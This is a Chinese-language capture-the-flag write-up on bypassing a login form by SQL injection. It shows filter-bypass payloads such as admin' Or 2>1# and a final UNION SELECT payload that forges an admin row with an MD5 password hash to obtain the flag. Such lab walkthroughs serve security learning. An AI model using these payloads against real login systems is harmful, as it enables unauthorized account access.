题目分析
这道题是一个登录框,需要输入账号密码,通过题目可以知道跟sql注入有关
尝试随便输入账号密码,123,123 ,提示wrong user!
再试试admin,123,提示wrong pass!
测试一下注入点,发现是单引号,尝试了一下 admin' or 1=1#
,回复 do not hack me!
or应该是被过滤掉了,用大小写绕过试试 admin' Or 1=1#
,还是被过滤了,测试了一下发现等号也被过滤了。admin' Or 2>1#
,提示wrong pass!,这里我就开始不解了,明明万能密码绕过去了,为什么还是提示密码错误,那是不是一定要密码匹配上才可以?
解题过程
发现search.php中有一串base32注释,解密后是select * from user where username = '$name'
这应该是提示吧,但是感觉用万能密码能绕过去啊。既然要输入密码,那就想办法构造一个密码。
在自己的环境上测试一下
select * from user;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | amdin | admin |
| 2 | hehe | 202cb962ac59075b964b07152d234b70 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
select * from user union select 1,2,3;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | amdin | admin |
| 2 | hehe | 202cb962ac59075b964b07152d234b70 |
| 1 | 2 | 3 |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
发现union可以在实际的查询结果中添加一行虚拟数据(实际上表中没有记录这串数据),那是不是就可以构造一个密码可控的admin账户呢
select * from user union select 1,'admin','admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | amdin | admin |
| 2 | hehe | 202cb962ac59075b964b07152d234b70 |
| 1 | admin | admin |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)
看来我的猜测没错,那构造一个可控的payload试一试
name=' union select 1,"admin","admin" %23&pw=admin
,还是显示wrong pass!
密码用md5加密再试试name=' union select 1,"admin","21232f297a57a5a743894a0e4a801fc3" %23&pw=admin
成功获得flag